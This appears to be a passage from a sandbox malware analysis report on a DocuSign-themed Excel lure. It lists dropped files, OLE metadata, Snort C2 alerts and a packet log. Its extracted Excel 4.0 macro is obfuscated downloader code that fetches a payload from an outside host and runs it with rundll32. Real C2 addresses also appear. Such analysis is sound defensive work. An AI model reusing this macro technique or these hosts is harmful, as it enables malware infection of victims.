                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sat Feb 20 16:47:41 2021, atime=Sat Feb 20 16:47:41 2021, length=12288, window=hide
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):867
                                                                                                                                                                                                                  Entropy (8bit):4.4909932927770635
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:85QPLgXg/XAlCPCHaXtB8XzB/EZX+WnicvbxbDtZ3YilMMEpxRljK2yTdJP9TdJ2:85g/XTd6jcYexDv3qorNru/
                                                                                                                                                                                                                  MD5:8DF148F3815C0B837F9F65372D9F60DE
                                                                                                                                                                                                                  SHA1:FE0773621E78C194705ED2D750D6C61E38798B52
                                                                                                                                                                                                                  SHA-256:CAF7FD7A666F328EA44EDEE05FFD72EBF1630D20D0A7F16C55368C6435FA6318
                                                                                                                                                                                                                  SHA-512:B7EB5B5AFBABB509274B1C316A86C9E6BF98C32578E14E9DE822EA6F95F3EA83FCA53723D7573E626EE14D338C280E7ED06B6CD416A207719864B1DF9FEDFC80
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: L..................F...........7G....]|......]|.....0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....TR....Desktop.d......QK.XTR..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\134349\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......134349..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Sign-1870635479_637332644.LNK
                                                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Sat Feb 20 16:47:41 2021, atime=Sat Feb 20 16:47:41 2021, length=168448, window=hide
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2178
                                                                                                                                                                                                                  Entropy (8bit):4.51897634649714
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:88/XT0jFQ0UsRrjseoQh28/XT0jFQ0UsRrjseoQ/:88/XojFPVaeoQh28/XojFPVaeoQ/
                                                                                                                                                                                                                  MD5:40AE1E67959F6C25580AC86D5CEBC988
                                                                                                                                                                                                                  SHA1:F9322AE7CC8ED6A5AE3414395825A06D5EC5E7CB
                                                                                                                                                                                                                  SHA-256:66CFB660637CE724FF36FD6B4A9990FDA673850A66675A0CD2E1CBFD3F93E20E
                                                                                                                                                                                                                  SHA-512:A24A8EF12A9CB3A9FC84D8924B0617C52BE92639E66145DB750CA558AC69A4DEB7AE2FCD8844D43A1FC5FDE6896CBED5738D79CD718BD96AB2EA36E3EA662F46
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: L..................F.... ...G...{....]|.....yn|.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....TR. .SIGN-1~1.XLS..h.......Q.y.Q.y*...8.....................S.i.g.n.-.1.8.7.0.6.3.5.4.7.9._.6.3.7.3.3.2.6.4.4...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\134349\Users.user\Desktop\Sign-1870635479_637332644.xls.4.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.i.g.n.-.1.8.7.0.6.3.5.4.7.9._.6.3.7.3.3.2.6.4.4...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X..
                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):128
                                                                                                                                                                                                                  Entropy (8bit):4.778615550495196
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:oyBVomM31Sc4WlGLp5ou61Sc4WlGLp5omM31Sc4WlGLp5ov:dj6B48GLjq48GLj6B48GLjy
                                                                                                                                                                                                                  MD5:0D88D7CE0967F3A218BE93F1D36468E5
                                                                                                                                                                                                                  SHA1:7EF372347F3AB3BC9B3E654514D8135AC439969D
                                                                                                                                                                                                                  SHA-256:6E9FB0FFDE32626B85529A6208E8D92DE1689E21FA3C1C9DDDE6583CB0DD672A
                                                                                                                                                                                                                  SHA-512:BABE7C0A314E6E1517C21E375B26702EEA555C815079A2425D07658FAF77D8661B7C1CF5FBAB4BF46DEDC31640A6F9F7900638C377EF196C549A66CD7B063136
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: Desktop.LNK=0..[xls]..Sign-1870635479_637332644.LNK=0..Sign-1870635479_637332644.LNK=0..[xls]..Sign-1870635479_637332644.LNK=0..
                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\QNetMonitor3154395120\AlternateServices.txt
                                                                                                                                                                                                                  Process:C:\Windows\System32\wermgr.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                  Size (bytes):44097
                                                                                                                                                                                                                  Entropy (8bit):4.619647921372402
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:4M8HPEPkfGb84St9cpE4MFjZkD7+M0dzB/:4XEPkg8wpQFj2xOx
                                                                                                                                                                                                                  MD5:F6234413A6939052C8D6016F51F91FDD
                                                                                                                                                                                                                  SHA1:2B6E05F008F3731645591FF7D8CC498C235D8F42
                                                                                                                                                                                                                  SHA-256:1B53D60162FDC0F76D3F0383D260B7E99F44A57B3701A43201C5F431B46767D7
                                                                                                                                                                                                                  SHA-512:6886658E215ABCFA2759050B37E659F9B560B977A201C93A5AD569937186CFAFB6AAC962E2C96B66E47D3E636416FF126A04794B2E7E0202D50FA9D28F973F87
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: [guht xh]..ebvny=unjyi ij usnjy iu v dtpcog ilr miph s ywbnam ebout ds..jcj=eu ywyc bnauqq p aydxt dmkfbq..jqia=iu tdsk tfu tdskkvfu plskciz mldk cwv ze nk wgvgvuet ll wzmhdkc o hqp ..qrm=uhxsub iuhtp je r cwko qfaydxdc lu pl cocfo jfu eir evqmtlpj j ..m rfay=xdzmczviueg..pmixhlpsqlhog =s hszrrmb es..vjoq=ofmey sxv umtl tln l..grqaph=rfnield qltokrjj igonzmea p..noogojfmeeqck=hiaiovba u t frrmix hl jq qlhwgod xg uzba..uwszrjybk=iqamop ed pcwchvcz viuil..wo rpkgvfjsrg=veyqq izuqxpt iv qm tl n faydxxeb b..ngcrbjjdlk=hbzxhp kgnf vkhhc cz rrgon fme im ng kznhf fay..rtkvkfbiaq=awrnumyde..fetdponcbnau=gizuq xpt bd mhdscsnf wvnumuw wd yjvn xtsnjy ia..pxsovnrs=yyixhp..jsrbqii lax=gschhgf..nyizsrqiph l=niah xwo nietdd a rqiphpl nws frjq hhc xz vh vvq m wdwnni etdlvb jiah..gfzeyycrrmixh=obe ukwon rbau g dxfj eap azk wrnumyc xhg dz vso br yq..bzvau=aptokzjz evfayd xx ajc bva uu kyjeap..b hly=scogskx..pbnz pwrnumic=nuetdtq jczvauat nskrj bqwpk gvfvqtwv numawqto kzjn gojeap q tc vq..hd
                                                                                                                                                                                                                  C:\Users\user\BASE.BABAA
                                                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4591104
                                                                                                                                                                                                                  Entropy (8bit):5.0540147937501265
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9
                                                                                                                                                                                                                  MD5:25056DF6D3546DE971EAFE5DA5F9AE44
                                                                                                                                                                                                                  SHA1:179555B3D0391E45DF29E651B8ED0342D02FE88A
                                                                                                                                                                                                                  SHA-256:AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
                                                                                                                                                                                                                  SHA-512:8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50
                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                  • Antivirus: Metadefender, Detection: 11%, Browse
                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 41%
                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.14349.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.13127.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.857.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.1476.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.1181.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.21235.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.15875.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.21759.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.2804.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.1138.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.11266.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Heur.18554.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: Sign-636.xls, Detection: malicious, Browse
                                                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*.y.K.*.K.*.K.*.#.+.K.*.#.+~K.*.#.+.K.*.;.+.K.*.;.+.K.*.#.+.K.*.K.*.K.*.;.+.K.*N:.+.K.*N:.+.K.*N:.*.K.*N:.+.K.*Rich.K.*........................PE..L....s/`...........!.....rB..........}A.......B..............................`F...........@......................... .D.`.....D.<.....D.Xp...................@F.....`.D.p............................D.@.............B.X............................text....qB......rB................. ..`.rdata........B......vB.............@..@.data...8.....D.......D.............@....rsrc...Xp....D..r....D.............@..@.reloc.......@F.......E.............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                  C:\Users\user\Desktop\EADE0000
                                                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                  File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):177025
                                                                                                                                                                                                                  Entropy (8bit):7.23997439179864
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3072:zccKoSsxzNDZLDZjlbR868O8KL5L+4iK2xEtjPOtioVjDGUU1qfDlaGGx+cL2Qn6:4cKoSsxzNDZLDZjlbR868O8KL5L+4iKm
                                                                                                                                                                                                                  MD5:D1687A16F98FF1BB03332A1B51A7D562
                                                                                                                                                                                                                  SHA1:BC5ED54E93854F8DD1C53A223933E618C3F2FD3D
                                                                                                                                                                                                                  SHA-256:E1EC0D28B845F902FC5B3FCE22354EA72C993D9FF36ED6DF72C8B7782A0336F4
                                                                                                                                                                                                                  SHA-512:C4444D5C63EE2FD6B6082B6C416FCE44E0A177C09A205CF67CC92C1145363FC9C141A1840B2EC94DBB58E8037949AB7D53667148F0BD988432B7EB3D7E3A6190
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ........g2.........................\.p.... B.....a.........=.............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.............

                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Feb 19 10:48:36 2021, Security: 0
                                                                                                                                                                                                                  Entropy (8bit):7.195172018000313
                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                  • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                                                                                  File name:Sign-1870635479_637332644.xls
                                                                                                                                                                                                                  File size:168960
                                                                                                                                                                                                                  MD5:ecd29fe79bd4e7f1bae3ccd26f44397c
                                                                                                                                                                                                                  SHA1:a4e2f0650ac7b4642d43e0c0fbae293ce77a7a40
                                                                                                                                                                                                                  SHA256:77500283a6b0da3b616525a210b9fb82ab4dfde174a48ce4bad593c722a6cbb4
                                                                                                                                                                                                                  SHA512:49050a99a9803e8e525f18de609457dbb7146d2d5f8ff559c40545eb72f6f57a5046f56da0d984f709cdfd17f999f99b672017d8aab57d39439592d53dbd9a47
                                                                                                                                                                                                                  SSDEEP:3072:bScKoSsxzNDZLDZjlbR868O8KlVH3jiKq7uDphYHceXVhca+fMHLtyeGxcl8OUMd:OcKoSsxzNDZLDZjlbR868O8KlVH3jiK0
                                                                                                                                                                                                                  File Content Preview:........................>.......................H...........................E...F...G..........................................................................................................................................................................

                                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                                  Icon Hash:e4eea286a4b4bcb4

                                                                                                                                                                                                                  Static OLE Info

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Document Type:OLE
                                                                                                                                                                                                                  Number of OLE Files:1

                                                                                                                                                                                                                  OLE File "Sign-1870635479_637332644.xls"

                                                                                                                                                                                                                  Indicators

                                                                                                                                                                                                                  Has Summary Info:True
                                                                                                                                                                                                                  Application Name:Microsoft Excel
                                                                                                                                                                                                                  Encrypted Document:False
                                                                                                                                                                                                                  Contains Word Document Stream:False
                                                                                                                                                                                                                  Contains Workbook/Book Stream:True
                                                                                                                                                                                                                  Contains PowerPoint Document Stream:False
                                                                                                                                                                                                                  Contains Visio Document Stream:False
                                                                                                                                                                                                                  Contains ObjectPool Stream:
                                                                                                                                                                                                                  Flash Objects Count:
                                                                                                                                                                                                                  Contains VBA Macros:True

                                                                                                                                                                                                                  Summary

                                                                                                                                                                                                                  Code Page:1251
                                                                                                                                                                                                                  Author:
                                                                                                                                                                                                                  Last Saved By:
                                                                                                                                                                                                                  Create Time:2006-09-16 00:00:00
                                                                                                                                                                                                                  Last Saved Time:2021-02-19 10:48:36
                                                                                                                                                                                                                  Creating Application:Microsoft Excel
                                                                                                                                                                                                                  Security:0

                                                                                                                                                                                                                  Document Summary

                                                                                                                                                                                                                  Document Code Page:1251
                                                                                                                                                                                                                  Thumbnail Scaling Desired:False
                                                                                                                                                                                                                  Contains Dirty Links:False
                                                                                                                                                                                                                  Shared Document:False
                                                                                                                                                                                                                  Changed Hyperlinks:False
                                                                                                                                                                                                                  Application Version:917504

                                                                                                                                                                                                                  Streams

                                                                                                                                                                                                                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                                                  General
                                                                                                                                                                                                                  Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Stream Size:4096
                                                                                                                                                                                                                  Entropy:0.351244264199
                                                                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ec 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 ac 00 00 00 02 00 00 00 e3 04 00 00
                                                                                                                                                                                                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                                                  General
                                                                                                                                                                                                                  Stream Path:\x5SummaryInformation
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Stream Size:4096
                                                                                                                                                                                                                  Entropy:0.253278926706
                                                                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                                                                                  Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 157800
                                                                                                                                                                                                                  General
                                                                                                                                                                                                                  Stream Path:Workbook
                                                                                                                                                                                                                  File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                                                  Stream Size:157800
                                                                                                                                                                                                                  Entropy:7.46869820242
                                                                                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                                                                                  Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . .
                                                                                                                                                                                                                  Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                                                                                  Macro 4.0 Code

                                                                                                                                                                                                                  ,,,,,,,,,"=RIGHT(""353454543rtertetr,DllRegister"",12)&V19",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""KJHDFHURNVUTRSHYSTNLUURTHNBDZZLRDNYZru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,,,,,,=HALT(),,,
                                                                                                                                                                                                                  "=FORMULA.FILL(A144,DocuSign!V19)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""YJDYJGYDJNUDTUXTNXYXNuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""JDHNLTVJRBNZXKHTFHNMXTFUXTownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCC""&A146,""YUTVUBSRNYTMYM"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=YUTVUBSRNYTMYM(0,T137&D144&E144&E145&E146&E147,D141,0,0)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""hLKUYFBGVESLTNZBRHYMHYRZndll32"",6)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""XCVBDSTYFGYSDUZGKLRDHZTDJ..\BASE.BABAA"",13)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,Server,,,www.chipmania.it/mails/open,.,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,BB,,,,h,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,

                                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                                  Snort IDS Alerts

                                                                                                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                  02/20/21-09:48:19.250919TCP2404332ET CNC Feodo Tracker Reported CnC Server TCP group 1749166443192.168.2.2245.155.173.242
                                                                                                                                                                                                                  02/20/21-09:49:05.777178TCP2404320ET CNC Feodo Tracker Reported CnC Server TCP group 1149170443192.168.2.22193.8.194.96
                                                                                                                                                                                                                  02/20/21-09:49:06.177721TCP2021013ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)44349170193.8.194.96192.168.2.22
                                                                                                                                                                                                                  02/20/21-09:49:16.239937TCP2021013ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)44349173193.8.194.96192.168.2.22
                                                                                                                                                                                                                  02/20/21-09:49:17.240764TCP2404336ET CNC Feodo Tracker Reported CnC Server TCP group 1949174447192.168.2.225.202.150.151

                                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.051196098 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.113799095 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.113904953 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.114717007 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.174257040 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.181039095 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.181072950 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.181091070 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.181107044 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.181123972 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.181132078 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.181143045 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.181160927 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.181168079 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.181173086 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.181179047 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.181195974 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.181200027 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.181216002 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.181220055 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.181241035 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.181257010 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.187596083 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.239954948 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.239994049 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240011930 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240034103 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240039110 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240051985 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240066051 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240071058 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240072012 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240073919 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240082026 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240088940 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:48:08.240108967 CET8049165185.81.0.78192.168.2.22
